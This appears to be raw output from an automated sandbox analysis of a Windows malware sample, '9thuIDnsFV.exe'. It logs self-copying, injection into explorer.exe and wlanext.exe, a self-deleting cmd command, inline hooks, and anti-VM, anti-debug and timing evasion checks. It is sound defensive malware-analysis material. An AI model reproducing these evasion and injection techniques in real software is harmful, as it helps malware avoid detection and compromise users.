          Source: 9thuIDnsFV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 9thuIDnsFV.exeVirustotal: Detection: 38%
          Source: 9thuIDnsFV.exeReversingLabs: Detection: 23%
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeFile read: C:\Users\user\Desktop\9thuIDnsFV.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\9thuIDnsFV.exe 'C:\Users\user\Desktop\9thuIDnsFV.exe'
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess created: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe vgyjnbhui
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess created: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe vgyjnbhui
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 9thuIDnsFV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 9thuIDnsFV.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000E.00000000.455604694.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 9thuIDnsFV.exe, 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdb source: 9thuIDnsFV.exe, 0000000A.00000002.498749026.0000000001DB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 9thuIDnsFV.exe, 0000000A.00000002.498187012.0000000001980000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: 9thuIDnsFV.exe, 0000000A.00000002.498749026.0000000001DB0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000E.00000000.455604694.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_004168E0 push eax; iretd
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00416907 push ds; retf
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_004093D6 push es; retf
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00416CB4 pushfd ; retf
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_004176ED push ebx; iretd
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_0041CEB5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_0041CF6C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_0041CF02 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_0041CF0B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019FD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F193D6 push es; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F268E0 push eax; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F26907 push ds; retf
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F276ED push ebx; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F2CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F2CF6C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F2CF02 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F2CF0B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 20_2_02F26CB4 pushfd ; retf
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeFile created: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xEB
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 9thuIDnsFV.exe, 00000001.00000002.424675274.00000000033B6000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000002F198E4 second address: 0000000002F198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000002F19B5E second address: 0000000002F19B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeWindow / User API: threadDelayed 1778
          Source: C:\Users\user\Desktop\9thuIDnsFV.exe TID: 6368Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000000E.00000000.452463166.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000E.00000000.452393982.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: 9thuIDnsFV.exeBinary or memory string: 3V97MjDwzNY10/CE3FdlPTc3QDRJmTHAfugGZ6zy6kRSVp+JZqpfk8Ffo9rd0+zrd2KPwKN3IwbD9bQLswwzDhyn4PdAUcVsBK5n\77208IwpEVv/3DMWkIIYr+GO0CgNtkcu/AzuJ1M8gweiCBUod5UYqcxkP0QAKl0hwizDJ5b4pZws5eikxSjRN4UuQgGFVmciINBjSJ\7NLLQdzKojxbpxogKKZWM8B1Zm8STIrPk9ANQxogWqeZZSr2a6ZmW+yC
          Source: 9thuIDnsFV.exe, 00000001.00000002.424675274.00000000033B6000.00000004.00000001.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
          Source: explorer.exe, 0000000E.00000000.445336091.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000E.00000000.447425630.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 9thuIDnsFV.exe, 00000001.00000002.424675274.00000000033B6000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000E.00000000.452393982.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000E.00000000.447425630.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 9thuIDnsFV.exeBinary or memory string: drNC7TIZTDW2xdJg6023IiTjmTuQlBYEtkPt+T/Us4SLdWi2qlCcddJ8V\7R0tAT+wpPaK51PoqE0nSbQ8X0gIV1QeMUdu7fBCInEO6ADyk+Y6Pj50bA89PiZBRwnUO9K3Ns0/btgvn5n7ypGhhTP0mZCoNxZCnK\7nl3WEoY5NqGqiGi1R8cYbO9DuvgNpNPQlR0tOwm091GcDraPdworFfl+/7zsOq5SWDlDvKmIEUiEy8m9CKUXDLxi9/PJynX1DX
          Source: explorer.exe, 0000000E.00000000.452004662.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: 9thuIDnsFV.exe, 00000001.00000002.424675274.00000000033B6000.00000004.00000001.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
          Source: explorer.exe, 0000000E.00000000.445336091.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000E.00000000.445336091.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000000E.00000000.479950310.00000000045BE000.00000004.00000001.sdmpBinary or memory string: 8f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
          Source: explorer.exe, 0000000E.00000000.452004662.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000000E.00000000.452463166.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: 9thuIDnsFV.exeBinary or memory string: w9pCcvmCiBslevp3ENTZ7Gyl/KlvjcVV5O5tkWLNvHWw9ziuxOZ14kJmcS95b5CG53h40gwz2mI1prpmN63K34RqlKTfBw\782M5soaHLKwjrxjbF44wWMH/mXEYo9EtG3RCo8RZu8v2iOPMGsDtVxMtQ/RInns4u4kM+YSRbJmUomHt2yet9GjBmvzKjwGocN5e2\7S6Ai96HFLuDqu3p28Ouz3oupVo6bq9Tq4z84+QXrbm011Rn3/M4xD+nOhVufu
          Source: explorer.exe, 0000000E.00000000.465503164.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 0000000E.00000000.445336091.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\9thuIDnsFV.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_00409A90 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019CC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A58DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A26DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A78D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A2A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019AAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019C4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019C7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A23540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019AC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019B849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019A9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_01A23884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019E90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exeCode function: 10_2_019D20A0 mov eax, dword ptr fs:[00000030h]
